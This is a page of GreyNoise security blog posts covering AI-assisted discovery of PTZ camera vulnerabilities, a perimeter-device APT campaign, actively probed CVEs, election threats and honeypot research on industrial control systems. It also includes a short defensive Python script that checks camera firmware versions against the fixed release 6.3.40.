Blog

GreyNoise Intelligence Discovers Zero-Day Vulnerabilities in Live Streaming Cameras with the Help of AI

GreyNoise has discovered previously undisclosed zero-day vulnerabilities in IoT-connected live streaming cameras, leveraging AI to catch an attack before it could escalate. These cameras are reportedly used in sectors such as industrial operations, healthcare, and other sensitive environments like houses of worship, highlighting the urgent need for stronger cybersecurity defenses as the threat landscape continues to evolve.

This discovery was made possible after a GreyNoise honeypot detected an attempt to execute an exploit against it. An attacker had developed and automated a zero-day vulnerability exploit, using a broad-spectrum reconnaissance and targeting strategy to run it across the internet. However, the exploit hit GreyNoise’s global sensor network, where GreyNoise’s proprietary internal AI technology flagged the unusual activity. Upon further investigation, GreyNoise researchers discovered the zero-day vulnerabilities. Once exploited, attackers could potentially seize complete control of the cameras, view and/or manipulate video feeds, disable camera operations, and enlist the devices into a botnet to launch denial-of-service attacks.

This marks one of the first instances where threat detection has been augmented by AI to discover zero-day vulnerabilities. By surfacing malicious traffic that traditional tools would have missed, GreyNoise successfully intercepted the attack, identified the vulnerabilities, and reported them before they could be widely exploited. The company’s proactive approach, combining AI-powered detection with expert human analysis, proves that AI can dramatically accelerate the discovery of vulnerabilities — making the internet safer, one discovery at a time. 

GreyNoise partnered with VulnCheck to responsibly disclose the flaws, tracked as CVE-2024-8956 and CVE-2024-8957.   

View the full technical analysis and register now for GreyNoise’s expert panel webinar to learn more about the broader implications of these findings for security professionals. 

Affected Devices and Common Use-Cases

The vulnerabilities impact NDI-enabled pan-tilt-zoom (PTZ) cameras from multiple manufacturers. Affected devices run VHD PTZ camera firmware earlier than 6.3.40, which ships in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices built on the Hisilicon Hi3516A V600 SoC (V60, V61, and V63). These cameras, which feature an embedded web server allowing direct access from a web browser, are reportedly deployed in environments where reliability and privacy are crucial, including:

  • Industrial and manufacturing plants for machinery surveillance and quality control.
    (Images: Industrial Machinery Surveillance; AI-Driven Manufacturing Camera. Source: PTZOptics.com)
  • Business conferences for high-definition video streaming and remote presentations.
    (Image: Business Streaming Setup. Source: PTZOptics.com)
  • Healthcare settings for telehealth consultations and surgical live streams.
    (Images: Surgical Live Stream; Telehealth Camera in Hospital Room. Source: PTZOptics.com)
  • State and local government environments, including courtrooms.
    (Image: Courtroom Surveillance Camera. Source: PTZOptics.com)
  • Houses of worship for live streaming of religious services.
    (Image: Religious Service Streaming Camera. Source: PTZOptics.com)

Affected devices are typically high-cost live streaming cameras, sometimes exceeding several thousand dollars. 

Vulnerabilities Discovered

CVE-2024-8956: Insufficient Authentication (CVSS 9.1, Critical)
  • Inadequate authentication mechanisms could allow an attacker to access sensitive information such as usernames, MD5 password hashes, and configuration data. MD5 hashes have long been considered insecure, meaning attackers could potentially crack them and gain administrative access.

CVE-2024-8957: OS Command Injection (CVSS 7.2, High)
  • Chained with CVE-2024-8956, this flaw lets an attacker execute arbitrary OS commands on the affected cameras, potentially seizing full control of the system.

Full Camera Takeover, Unauthorized Surveillance, Data Breach, Broader Attacks, and More

GreyNoise found the affected cameras to be vulnerable to a range of potentially dangerous attacks. These vulnerabilities, if exploited, could potentially expose sensitive business meetings, compromise telehealth sessions, and disrupt cameras deployed in industrial settings, leaving organizations potentially exposed to data and privacy breaches.

Full Camera Takeover and Unauthorized Surveillance
  • By exploiting both CVE-2024-8956 and CVE-2024-8957, an attacker could potentially seize full control of the camera, view and/or manipulate the video feeds, and gain unauthorized access to sensitive information. Devices could also be potentially enlisted into a botnet and used for denial-of-service attacks. 

Attacks like this are not new — in 2021, live feeds of 150,000 cameras inside schools, hospitals, and more were exposed. Vulnerable IoT devices are prime targets for attackers looking to add compromised devices to a botnet, like the infamous Mirai botnet. 

Broader Network Attacks and Data Breach
  • An attacker could extract network details, including IP addresses, MAC addresses, and gateway configurations, potentially leveraging this information to pivot and move laterally into the device’s local network. This could potentially compromise other systems on the same network, which could lead to broader data breaches or even the spread of ransomware. 
Disablement of Camera Operations
  • CVE-2024-8956 allows for configuration files to be updated or entirely overwritten. An attacker could exploit this vulnerability to intentionally misconfigure or disable the camera, potentially disrupting camera operations. 

How GreyNoise Discovered These Vulnerabilities Using AI

Security teams today face an overwhelming number of alerts, many of which result from harmless internet activity like routine scans and benign traffic. With countless alerts pouring in daily, identifying threats becomes incredibly difficult, and many serious vulnerabilities can go unnoticed amid the noise. 

This is where AI steps in. GreyNoise’s Sift, powered by large language models (LLMs) trained on vast amounts of internet traffic — including traffic targeting IoT devices — identifies anomalies that traditional systems may miss. Instead of just reacting to known threats, Sift excels at spotting new anomalies, threats that haven't been identified yet or don’t fit any known signatures. 

What Makes Sift Different 

Sift analyzes real-time internet traffic and enriches that data with GreyNoise’s proprietary datasets. It then runs the data through advanced AI systems, which help separate routine activity from potential threats. This process allows researchers to focus on truly meaningful threats without getting lost in the noise. 

In this case, Sift flagged unrecognized traffic that had not been tagged as a known threat. This caught the attention of GreyNoise researchers, who further investigated the unusual traffic. Their investigation led to the discovery of two previously unknown zero-day vulnerabilities in live streaming cameras — highlighting how AI can transform the speed and accuracy of cybersecurity research. 

“This isn’t about the specific software or how many people use it — it’s about how AI helped us catch a zero-day exploit we might have missed otherwise,” said Andrew Morris, Founder and Chief Architect at GreyNoise Intelligence. “We caught it before it could be widely exploited, reported it, and got it patched. The attacker put a lot of effort into developing and automating this exploit, and they hit our sensors. Today it’s a camera, but tomorrow it could be a zero-day in critical enterprise software. This discovery proves that AI is becoming essential for detecting and stopping sophisticated threats at scale.” 

Human Researchers + AI: A Powerful Combination 

By rapidly filtering out irrelevant traffic, Sift gives human researchers a clear head start. Capable of sifting through millions of data points, it enables researchers to focus on critical threats in real-time. This combination of AI-driven anomaly detection and human-led investigation is essential in today’s fast-paced cybersecurity landscape, where attackers are constantly evolving their tactics. Without Sift’s machine learning capabilities, these vulnerabilities might have remained hidden. 

The Broader IoT Challenge: Proliferation and Internet Noise 

GreyNoise’s discoveries shed light on a larger issue facing the rapidly growing IoT landscape. With nearly 19 billion IoT devices in operation globally, industrial and critical infrastructure sectors rely on these devices for operational efficiency and real-time monitoring. However, the sheer volume of data generated makes it challenging for traditional tools to discern genuine threats from routine network traffic, leaving systems vulnerable to sophisticated attacks. Last month, U.S. authorities dismantled a botnet that leveraged a variety of IoT devices, including IP cameras. IoT devices remain a prime target for attackers looking to exploit insecure design and functionality. 

Recommendations to Protect Your Organization

Organizations running VHD PTZ camera firmware earlier than 6.3.40 on PTZOptics, Multicam Systems SAS, or SMTAV Corporation devices built on the Hisilicon Hi3516A V600 SoC (V60, V61, and V63) should take immediate action to patch the discovered vulnerabilities and secure their systems.

VulnCheck alerted affected manufacturers to the flaws, only receiving a response from PTZOptics. The manufacturer released firmware updates addressing these flaws.
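As an added example (not GreyNoise's, VulnCheck's or any camera vendor's code), the following script triages an asset inventory against the 6.3.40 firmware threshold named above. It assumes the inventory is a CSV with host, vendor and firmware columns; the rows are constructed sample data. The detail worth noticing is that firmware strings must be compared component by component as integers, since a plain string comparison ranks "6.3.9" above "6.3.40" and would silently miss a vulnerable camera.

```python
"""Flag PTZ cameras whose VHD firmware is below the fixed release 6.3.40.

Added example, not vendor code. Inventory layout (CSV with host, vendor,
firmware columns) and all host names/versions are constructed assumptions.
"""
import csv
import io
import re

FIXED_VERSION = "6.3.40"  # VHD PTZ firmware versions earlier than this are affected

# Vendors named in the advisory text as shipping the affected VHD firmware.
AFFECTED_VENDORS = {"ptzoptics", "multicam systems sas", "smtav corporation"}

# Constructed sample inventory: hosts and versions are made up for illustration.
SAMPLE_INVENTORY = """host,vendor,firmware
cam-lobby,PTZOptics,6.3.9
cam-or1,PTZOptics,6.3.40
cam-court,SMTAV Corporation,6.2.17
cam-plant,Multicam Systems SAS,6.3.41
cam-vendor-x,OtherCo,1.0.0
cam-unknown,PTZOptics,
"""


def parse_version(text):
    """Turn '6.3.40' into (6, 3, 40); return None if the field is not a dotted number."""
    text = text.strip()
    if not re.fullmatch(r"\d+(\.\d+)*", text):
        return None
    return tuple(int(part) for part in text.split("."))


def is_vulnerable(firmware, fixed=FIXED_VERSION):
    """True when firmware is numerically lower than the fixed release.

    Returns None when the version field is missing or unparsable, so the
    caller can route the device to manual review instead of marking it safe.
    """
    current = parse_version(firmware)
    if current is None:
        return None
    # Tuple comparison is element-wise on integers: (6, 3, 9) < (6, 3, 40).
    return current < parse_version(fixed)


def triage_inventory(csv_text):
    """Bucket in-scope hosts into 'vulnerable', 'patched' and 'review' lists."""
    result = {"vulnerable": [], "patched": [], "review": []}
    for row in csv.DictReader(io.StringIO(csv_text)):
        vendor = row["vendor"].strip().lower()
        if vendor not in AFFECTED_VENDORS:
            continue  # not one of the VHD-firmware vendors named in the advisory
        verdict = is_vulnerable(row["firmware"])
        if verdict is None:
            result["review"].append(row["host"])
        elif verdict:
            result["vulnerable"].append(row["host"])
        else:
            result["patched"].append(row["host"])
    return result


if __name__ == "__main__":
    for bucket, hosts in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

Devices with an empty or malformed firmware field land in the review bucket rather than being assumed patched.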

Read the GreyNoise Labs blog for technical analysis and deeper insight into how Sift helped discover these zero-day vulnerabilities.

Don’t Miss the Webinar!

Join our expert panel for an exclusive webinar where we dive deep into the technical details and strategic implications of this discovery to provide the context you need to better protect your organization. 

Register now to reserve your spot today and learn how AI-driven cybersecurity is changing the status quo and how it can transform your security strategy. 

The Persistent Perimeter Threat: Strategic Insights from a Multi-Year APT Campaign Targeting Edge Devices

A newly released report by Sophos reveals a sophisticated multi-year APT (Advanced Persistent Threat) campaign that exploited network perimeter devices, using both new and older vulnerabilities to infiltrate high-value targets. Beginning in 2018, the campaign’s actors leveraged advanced tactics, techniques, and procedures to target internet-facing devices belonging to government and critical infrastructure entities, and other high-value targets. The campaign demonstrates that APT actors are increasingly focusing on network perimeters — especially unpatched, internet-facing devices like VPNs, routers, and other edge infrastructure — as prime entry points for further compromise. 

“This campaign is a wake-up call about just how serious the threat to edge devices really is,” said Andrew Morris, Founder and Chief Architect at GreyNoise Intelligence. “Attackers are getting in through overlooked devices, deploying rootkits at the firmware level, and persisting on everything from routers to security cameras to HVAC systems and digital signage. And here’s the thing: detecting this kind of persistence today is incredibly tough. Major device platform vendors have entire teams dedicated to rooting out these threats on PCs, and it’s still a struggle. So, imagine trying to detect and defend against this level of sophistication on an embedded device like a router or a modem — almost no chance.”

At GreyNoise, we observe perimeter-focused attacker behavior across a range of vulnerabilities, both new and resurgent, providing us with a unique view of these threats as they unfold. This blog unpacks key strategic insights from the campaign, explains why network perimeter exploitation should be a top security focus, and provides actionable steps to help security teams stay one step ahead. We’ll explore some of the actively probed CVEs associated with this campaign, the ongoing risks of unpatched devices, and practical ways to mitigate exposure using real-time intelligence. 

GreyNoise is proud to have contributed to Sophos’ research and we encourage you to read the full report. In an effort to aid in exposure mitigation efforts, GreyNoise is providing the following information to defenders:

  • View exploit activity and actively block exploitation of the CVEs related to Pacific Rim
  • Get 14 days of free access to GreyNoise Vulnerability Prioritization Intelligence to enable active blocking against exploitation of Pacific Rim-related vulnerabilities 

The APT Campaign: A Sophisticated and Stealthy Multi-Year Assault 

The Sophos report details a sophisticated campaign beginning in 2018, where attackers initially targeted Cyberoam, an India-based Sophos subsidiary. Using intelligence gathered from Cyberoam, along with additional development, the attackers attempted mass exploitation to build a network of operational relay boxes (ORBs). However, after largely failing in this due to detection, they shifted tactics to remain under the radar, focusing exclusively on a small number of high-value targets. This more targeted approach enabled them to infiltrate select government agencies, critical infrastructure, and influential organizations such as embassies. This campaign underscores how APTs adapt and leverage both collected intelligence and advanced tradecraft to achieve their strategic goals. 

The attackers exhibited patience and adaptability, evolving their approach from broad, indiscriminate scanning to targeted reconnaissance and exploitation. Their tactics included custom rootkits, firmware-based persistence, and sophisticated command-and-control channels, like ICMP tunneling and proxy chains, enabling long-term, stealthy access to compromised networks. This combination of large-scale scanning followed by focused exploitation demonstrates how attackers systematically identify and prioritize vulnerabilities on perimeter devices to achieve their objectives.  

The Network Perimeter: An Overlooked but Critical Attack Vector

This campaign highlights how perimeter devices — including VPNs, routers, and other internet-facing systems — serve as critical points of entry for attackers. Although these devices are essential to network operations, ensuring timely patching can be challenging due to the business impact of taking these systems offline, making them attractive targets for attackers seeking to exploit this operational challenge. 

GreyNoise’s data consistently shows that perimeter devices draw significant reconnaissance and scanning activity from malicious IPs probing weak points. Our real-time intelligence captures how attackers conduct broad scans across these devices, identifying which ones might be vulnerable to exploitation.

This heatmap highlights the volume of malicious IPs actively targeting high-profile systems leveraging CVEs related to the campaign, illustrating the intensity of reconnaissance and exploitation and offering critical insights for prioritizing defenses around these devices. 

Security professionals should regularly audit and patch all high-profile systems that are internet-facing, especially those with widely known vulnerabilities. Leveraging IP blocklists allows security teams to intercept and block scanning activity on these endpoints, helping to prevent initial access and reduce perimeter risks. 

Resurgent Vulnerabilities: The Persistent Threat of Unpatched CVEs

While newer vulnerabilities often dominate security headlines, this campaign underscores that attackers frequently exploit older vulnerabilities as well. Over 35% of the CVEs in Sophos' Database of Network Device CVEs were released before 2020, with 95% of them included in CISA’s Known Exploited Vulnerabilities (KEV) catalog — a vital resource for tracking high-risk vulnerabilities. Despite available patches, these CVEs often remain unpatched on many perimeter devices, making them easy targets for attackers.

Re-evaluate patching priorities to include older vulnerabilities that impact perimeter devices. GreyNoise’s CVE tracking provides insights into which resurgent vulnerabilities see active targeting, allowing teams to focus on high-risk vulnerabilities that are exploited repeatedly. Older vulnerabilities continue to present significant risk if left unpatched, particularly on perimeter devices.  

The Role of Real-Time Reconnaissance in Understanding Exploitation Trends

According to the Sophos report, the attackers initially began their campaign with broad, indiscriminate scanning to locate vulnerable devices before refining their focus to specific, high-value targets. This phased approach demonstrates how attackers leverage large-scale reconnaissance to identify weak entry points and then shift to targeted exploitation. 

GreyNoise’s real-time data on reconnaissance trends offers visibility into this broader phase, capturing which high-profile CVEs attackers are actively probing across devices. This data reveals where attackers focus their scanning efforts on the network perimeter, providing early indicators of which vulnerabilities are most at risk. 

APTs Are Evolving, and the Network Perimeter Remains a Key Target

The precision and patience of this APT campaign send a clear message: perimeter devices remain prime targets, and unpatched vulnerabilities continue to offer attackers a simple path to network entry. The campaign reinforces the need for security professionals to maintain real-time visibility into these threats — both legacy CVEs and active reconnaissance of network devices. 

By monitoring attacker behavior and focusing on high-risk vulnerabilities, teams can take concrete steps to strengthen their defenses against persistent, sophisticated attacks. 

Supporting Your Exposure Management Efforts

We know that many organizations are working diligently to assess their exposure, analyze logs, and manage vulnerabilities following this APT campaign. To aid in this effort, GreyNoise is providing all users — both paying and free — 14 days of access to real-time exploitation data for the CVEs associated with this threat. Our goal is to help security teams stay informed and make it easier to track active exploitation. 

Access the Data:

  • View exploit activity and actively block exploitation of the CVEs related to Pacific Rim
  • Get 14 days of free access to GreyNoise Vulnerability Prioritization Intelligence to enable active blocking against exploitation of Pacific Rim-related vulnerabilities 
  • Read the documentation detailing how this feature works and how it can help you. 

----

Noah Stone contributed to this writeup in collaboration with GreyNoise Research. Stone is Head of Content at GreyNoise Intelligence, where he leads strategic content initiatives that illuminate the complexities of internet noise and threat intelligence. In past roles, he led partnered research initiatives with Google and the U.S. Department of Homeland Security. With a background in finance, technology, and engagement with the United Nations on global topics, Stone brings a multidimensional perspective to cybersecurity. He is also affiliated with the Council on Foreign Relations. 

U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now

A joint U.S. and UK advisory has identified 25 vulnerabilities tied to an exploitation campaign by Russian state-sponsored threat actors, specifically APT 29, the group behind the infamous SolarWinds hack. GreyNoise actively tracks 12 of the 25 vulnerabilities mentioned in the advisory. To provide real-time, actionable context, GreyNoise has detected that nine of these vulnerabilities are being actively probed by attackers, offering critical insights for organizations to prioritize their defenses.

Executive Summary 

  • The U.S. and UK governments issued a joint advisory warning of Russian state-sponsored cyber threats, specifically from APT 29, the group responsible for the SolarWinds hack.  
  • The advisory identifies 25 CVEs across major platforms (Cisco, Citrix, Microsoft, etc.) that are being opportunistically scanned by attackers. 
  • Tracking 12 of the 25 CVEs in the advisory, GreyNoise’s real-time intelligence shows nine of these vulnerabilities are currently experiencing active probing.
  • The advisory urges organizations to patch vulnerabilities to mitigate the threat and prevent potential exploitation.

Given the real-time nature of GreyNoise’s observations, the set of actively targeted vulnerabilities is likely to change over time. Please check the GreyNoise Visualizer for the latest information. 

What GreyNoise Is Seeing

GreyNoise observes internet traffic via its global network of sensors and honeypots, allowing it to track and classify behavior as malicious or benign. 

While the advisory outlines 25 vulnerabilities, GreyNoise is uniquely positioned to provide real-time insights, identifying the nine CVEs currently being probed. These active scans are part of mass, opportunistic efforts, a tactic commonly used by threat actors like APT 29 (Cozy Bear), although GreyNoise does not attribute malicious activity directly.

12 GreyNoise-Tracked CVEs in the Advisory — Nine Actively Probed Right Now 

Of the 12 GreyNoise-tracked CVEs mentioned in the joint advisory, GreyNoise observes exploitation or reconnaissance activity across the following: 

  1. CVE-2023-20198 — Cisco IOS XE Web UI Privilege Escalation 
  2. CVE-2023-4966 — Citrix NetScaler ADC Buffer Overflow
  3. CVE-2021-27850 — Apache Tapestry Deserialization of Untrusted Data
  4. CVE-2021-41773 — Apache HTTP Server Path Traversal
  5. CVE-2021-42013 — Apache HTTP Server Path Traversal
  6. CVE-2018-13379 — Fortinet FortiOS SSL VPN Path Traversal 
  7. CVE-2023-42793 — JetBrains TeamCity Authentication Bypass
  8. CVE-2023-29357 — Microsoft SharePoint Server Privilege Escalation
  9. CVE-2023-35078 — Ivanti Endpoint Manager Mobile Authentication Bypass

These vulnerabilities cover a wide range of products critical to business operations and infrastructure, making this real-time data invaluable for defenders to prioritize patching. 

Mass Opportunistic Scanning in the Spotlight

In the joint advisory, the agencies highlighted the threat of mass opportunistic scanning and Russian intelligence's reliance on it:

“This mass scanning and opportunistic exploitation of vulnerable systems, as opposed to more targeted operations, increase the threat surface to include virtually any organization with vulnerable systems. 

The SVR [Russian Foreign Intelligence] takes advantage of opportunistic victims to host malicious infrastructure, conduct follow-on operations from compromised accounts, or to attempt to pivot to other networks.”

The advisory comes at a time when attackers are increasingly relying on mass opportunistic scanning to compromise organizations, making it critical that organizations leverage real-time intelligence showing when and where attackers are engaged in reconnaissance and exploitation activity.

Recommendations to Protect your Organization

  1. Patch Immediately: Ensure the nine vulnerabilities identified by GreyNoise as being actively probed are patched as soon as possible.
  2. Monitor Real-Time Activity: Stay vigilant by leveraging real-time intelligence, which can help organizations track shifts in attacker activity. 
  3. Strengthen Defenses: Take steps to harden security controls, such as deploying firewall blocklists and reinforcing access control policies, to mitigate the risk of successful exploitation.

For more details, read the full U.S. and UK report here.

Protecting Democracy From The Growing Threat of Deepfakes and Disinformation

(This is the conclusion of our four-part series on "Understanding the Election Cybersecurity Landscape".)

Thanks to the emergence of powerful new AI-infused tools, a new battleground for democracy has emerged — one that does not rely on physical conflict but on the manipulation of information. Deepfakes and disinformation campaigns have become potent weapons, threatening the integrity of democratic processes. These sophisticated techniques not only mislead the public but also sow discord, making it increasingly difficult to distinguish truth from falsehood.

The Rise of Deepfakes and Disinformation

Deepfakes, that is, hyper-realistic, artificially generated or manipulated videos or audio recordings, have advanced to a level where even seasoned experts struggle to differentiate them from authentic media. Combined with disinformation campaigns, these tools can spread false narratives at alarming speed and scale.

The January 2024 New Hampshire primary was a wake-up call. Voters received robocalls featuring an AI-generated voice impersonating President Joe Biden, urging them to abstain from voting in the primary. Instead, the message encouraged them to save their vote for the general election. This incident is a single, yet stark, example of how domestic actors are utilizing advanced technologies to manipulate voters and disrupt electoral processes.

How Disinformation Campaigns Work

Disinformation campaigns thrive in online platforms, from social media to fake news websites. Both domestic and foreign actors — including Russia, China, and Iran — are involved in these efforts, as highlighted by the Intelligence Community's 2024 Annual Threat Assessment. Their goal is simple but destructive: to exacerbate societal divisions and influence voter perceptions.

In a recent case, the Department of Justice foiled a Russian-sponsored operation that aimed to sway voters by creating fake news sites that closely mimicked legitimate media outlets. Such tactics demonstrate the lengths to which bad actors will go to infiltrate and corrupt the information ecosystem.

The Damage to Democracy

Disinformation and deepfake technologies threaten to destabilize democratic institutions in several ways:

  • Erosion of Trust: When voters are repeatedly exposed to manipulated content, they begin to question the credibility of even legitimate sources of information, undermining the trust necessary for a healthy democracy.
  • Increased Polarization: By amplifying controversial issues and stoking social discord, disinformation campaigns deepen divisions within society. This polarization makes it harder for communities to come together on critical issues, further fragmenting the electorate.

Senator Warner’s Call to Action

In response to these escalating threats, Senator Mark R. Warner has called for decisive action. In a letter to the Cybersecurity and Infrastructure Security Agency (CISA), Warner outlined the critical need for state and local election officials to be equipped with the tools to counter disinformation and deepfakes. These officials are often voters' most trusted sources of election information, but they operate with limited resources and staff.

Warner urged CISA to strengthen its support for local election administrators and advocated for collaboration across government agencies, technology companies, academic institutions, and international allies to combat the spread of disinformation. Only through coordinated efforts can we build the resilience necessary to defend democratic processes.

What Can Be Done?

As technology continues to evolve, so too does the potential for its misuse. Deepfakes and disinformation campaigns are not just technological novelties; they are deliberate attempts to distort reality and undermine the public’s trust in elections. To safeguard democracy, proactive measures must be taken:

  • Awareness: The first line of defense is public awareness. Voters need to be alert to the reality that not everything they encounter — especially online — is trustworthy.
  • Media Literacy: Education is essential. By equipping people with the skills to critically evaluate the information they consume, we can reduce the impact of false narratives. Schools, community organizations, and media outlets all have a role to play in promoting media literacy.
  • Collaboration: A united front is essential to combat these sophisticated threats. Government agencies like CISA must work hand-in-hand with state and local election officials, private technology firms, and global allies to share intelligence, develop strategies, and respond swiftly to emerging threats.

Conclusion: Defending Democracy in the Digital Era

The threat posed by deepfakes and disinformation campaigns is real and growing. As technology advances, so does the potential for misuse by those seeking to disrupt democratic processes. By raising awareness, promoting media literacy, and fostering collaboration between government, private sectors, and international allies, we can protect the integrity of our elections and ensure that democracy endures in the digital age.

Now is the time to act. The future of democracy depends on our collective ability to respond to these new challenges. Let's safeguard the truth and uphold the trust that is the foundation of democratic society.

What Are Hackers Searching for in SolarWinds Serv-U (CVE-2024-28995)?

GreyNoise’s honeypots have been actively monitoring exploit attempts targeting the SolarWinds Serv-U vulnerability (CVE-2024-28995), revealing exactly what files attackers are after. From key system files to credential-containing configuration files, our data shows how attackers are scanning for vulnerable systems in real time.

GreyNoise interacts directly with attackers through its honeypots, providing verifiable, firsthand data. This gives security teams a clearer, more accurate picture of real-time threats, allowing them to cut through the noise and focus on what's truly malicious.

Read the full blog now!

Phishing and Social Engineering: The Human Factor in Election Security

(This is part three in our "Understanding the Election Cybersecurity Landscape" series.)

As we rapidly approach the 2024 U.S. elections, the human element remains one of the most vulnerable aspects of our electoral system. While technological defenses continue to evolve, state actors and cybercriminals in general are increasingly turning to phishing and social engineering tactics to exploit human psychology and gain unauthorized access to sensitive information or systems. These attacks pose a significant threat to election integrity by targeting election officials, campaign staff, and voters alike.

The Anatomy of Election-Related Phishing Attacks

Phishing attacks during election seasons often exploit the heightened emotions and time pressures associated with political campaigns. Attackers craft convincing emails, text messages, or social media posts that appear to come from trusted sources such as election boards, political parties, or candidates themselves. These messages typically create a sense of urgency or importance to prompt quick, unthinking responses from targets.

For example, an election official might receive an email that appears to be from a voting machine vendor, claiming there's a critical security update that needs immediate attention. The email could contain a malicious link or attachment that, when clicked, installs malware or captures login credentials. Similarly, voters might receive text messages with false information about polling place changes or registration requirements, containing links to fraudulent websites designed to steal personal information.

Social Engineering: Exploiting Trust and Authority

Social engineering attacks go beyond simple phishing by leveraging more complex psychological manipulation. These attacks often involve multiple touchpoints and can unfold over extended periods, making them particularly insidious.

In the context of elections, a social engineering attack might involve an attacker posing as an IT support technician, contacting county election workers with offers of assistance. Over time, the attacker builds trust and may eventually request remote access to systems or sensitive information under the guise of providing support. This type of attack exploits the often-overworked and under-resourced nature of many local election offices.

Another common tactic is impersonating authority figures. An attacker might pose as a high-ranking election official or party leader, using this perceived authority to pressure lower-level staff into bypassing security protocols or divulging confidential information.

The Cascading Impact on Election Security

The consequences of successful phishing and social engineering attacks can be far-reaching. A single compromised account or system can serve as an entry point for broader network infiltration, potentially leading to:

  • Disruption of election management systems, including those that are responsible for updating public-facing results on and after election day
  • Theft or manipulation of voter registration data
  • Unauthorized access to voting machine software or configurations
  • Leaks of sensitive campaign strategies or communications
  • Spread of disinformation from trusted sources

Moreover, even unsuccessful attacks can erode public confidence in the electoral process. The mere perception that election systems or officials might be compromised can fuel doubts about election integrity, which could be especially problematic this year.

Defending Against the Human Factor

Mitigating the risks posed by phishing and social engineering requires a multi-faceted approach that combines technological solutions with robust human training and awareness programs.

Technical Safeguards

  • Implement strong email filtering and anti-phishing tools
  • Use multi-factor authentication for all critical systems
  • Regularly update and patch software to address known vulnerabilities
  • Employ network segmentation to limit the potential spread of breaches

Human-Focused Defenses

  • Conduct regular, scenario-based training for election officials and staff
  • Develop clear communication protocols for sharing sensitive information
  • Establish verification procedures for requests involving system access or data transfers
  • Create a culture of security awareness where staff feel empowered to question suspicious or urgent requests

Public Education

  • Launch voter education campaigns on recognizing election-related phishing attempts
  • Provide clear, authoritative sources for election information
  • Encourage critical thinking and verification of election-related messages
  • Ensure there is a clear way for voters to recognize legitimate municipal communications, and provide straightforward ways for them to validate potentially illegitimate ones

The Road Ahead

As we move ever closer to the 2024 elections, the sophistication of phishing and social engineering attacks is likely to increase. The rise of AI-generated content, including deepfakes, will make it even more challenging to distinguish legitimate communications from fraudulent ones (something we will cover in the final installment).

However, by focusing on the human element – both in terms of vulnerabilities and strengths – we can build a more resilient election security ecosystem. Empowering election officials and voters with knowledge and critical thinking skills is our best defense against these evolving threats.

The integrity of our elections depends not just on secure technology, but on a vigilant and informed populace. By recognizing the central role of human factors in election security, we can work towards elections that are not only technologically sound but also trusted and resilient in the face of increasingly sophisticated attacks.

Challenging Assumptions: Enhancing the Understanding of Securing Internet-Exposed Industrial Control Systems

Censys and GreyNoise teamed up for the last three months to shed new light on the real-world threats facing internet-exposed industrial control systems (ICS). At LABSCon 2024, they shared their findings, challenging some long-held assumptions about ICS security.

Earlier this year, Censys researchers identified over 40,000 internet-connected ICS devices in the U.S., including over 400 human-machine interfaces (HMIs). Many of these interfaces required no authentication at the time of observation. HMIs provide easy-to-understand and easy-to-manipulate interfaces, which make them low-hanging targets for threat actors seeking to disrupt operations. Given the relative ease of manipulation, we were curious about the actual attack traffic such interfaces receive.

To conduct preliminary research, GreyNoise set up hyper-realistic emulations of internet-connected HMIs for critical control systems, camouflaging them by geography and ASNs. Glenn Thorpe, Sr. Director, Security Research & Detection Engineering at GreyNoise, analyzed forty-five days of data and reported these surprising and concerning findings:

  1. Rapid Targeting: Internet-connected HMIs were probed and scanned more quickly than baseline control sensors. Over 30% of IPs that touched the HMIs before a typical GreyNoise sensor were later identified as malicious.
  2. Focus on Remote Access: Contrary to expectations, attackers primarily targeted common Remote Access Service (RAS) protocols rather than ICS-specific communication protocols. Virtual Network Computing (VNC) was of particular interest to threat actors.

Implications for ICS Security

This research highlights a potential disconnect between perceived risks and actual threat actor behavior toward internet-exposed ICS. While the industry has long focused on securing ICS-specific communication protocols, the more pressing threat may lie in more common, easily exploitable entry points like remote access services. The swift targeting suggests a prioritization for probing such devices online.

This research underscores the critical importance of securing remote access services as a frontline defense for ICS environments. The relative ease of targeting these generic entry points may often render the exploitation of specialized ICS protocols unnecessary.

GreyNoise and Censys intend to continue this research to learn more based on these experimental findings.

The Role of State-Sponsored Actors in Election Interference

(This is part two in our "Understanding the Election Cybersecurity Landscape" series.)

State-sponsored actors play a critical role in election interference, employing a range of tactics to undermine the integrity of the electoral process. These actors, often backed by powerful nations like Russia, China, and Iran, have the resources and motivation to conduct sophisticated attacks that can erode public trust in elections.

Tactics and Techniques

State-sponsored actors engage in various activities interfering with elections, including cyberespionage, disinformation campaigns, and direct attacks on election infrastructure. Cyberespionage involves the theft of sensitive information, such as voter data or campaign communications, which can be used to influence public opinion or blackmail candidates. Disinformation campaigns, often conducted through social media, aim to spread false or misleading information to manipulate voter perceptions and sow discord. For example, Russia has been known to use fake personas and highly networked accounts to spread hyper-partisan themes effectively and quickly.

Direct attacks on election infrastructure are also a concern, as they can disrupt the voting process and undermine the integrity of election results. This includes attempts to gain physical or digital access to election systems, which can compromise their confidentiality, availability, or integrity. For instance, the Justice Department recently indicted two Russian propagandists associated with the state-funded media outlet RT for allegedly engaging in money laundering and channeling nearly $10 million to a right-leaning media organization.

We've also seen evidence of a recent suspected Iranian attack against the campaign of Republican presidential nominee Donald Trump, potentially resulting in the theft of internal campaign documents. The FBI is investigating the matter, as well as attempts to infiltrate President Joe Biden's reelection campaign, which became Vice President Kamala Harris' campaign after Biden dropped out of the race.

Impact and Implications

The activities of state-sponsored actors in election interference have significant implications for democratic societies. By undermining public trust in the electoral process, these actors can erode the legitimacy of governments and create social divisions. For example, research suggests that election interference campaigns can intensify internal divisions within a target state, making it harder for the political establishment to agree on priorities, implement policy, and respond to challenges from foreign actors.

Countermeasures

To counter the threats posed by state-sponsored actors, it is essential to understand their methods and recognize the signs of such interference. This includes investing in cybersecurity efforts for political campaigns, encouraging social media companies to remove deceptive or hateful posts, and passing legislation requiring online political ads to adhere to certain standards of truthfulness. Additionally, election officials should take steps to harden infrastructure against common attacks, utilize account security tools, and rehearse incident response plans.

What Can You Do?

Understanding the methods of state-sponsored actors and recognizing the signs of such interference is crucial in developing robust defenses. By investing in cybersecurity, promoting transparency in political advertising, and enhancing election infrastructure security, we can mitigate the risks posed by these actors and protect the integrity of democratic elections.

We've put together the following list of resources to help folks further understand and defend against this very real and present threat:

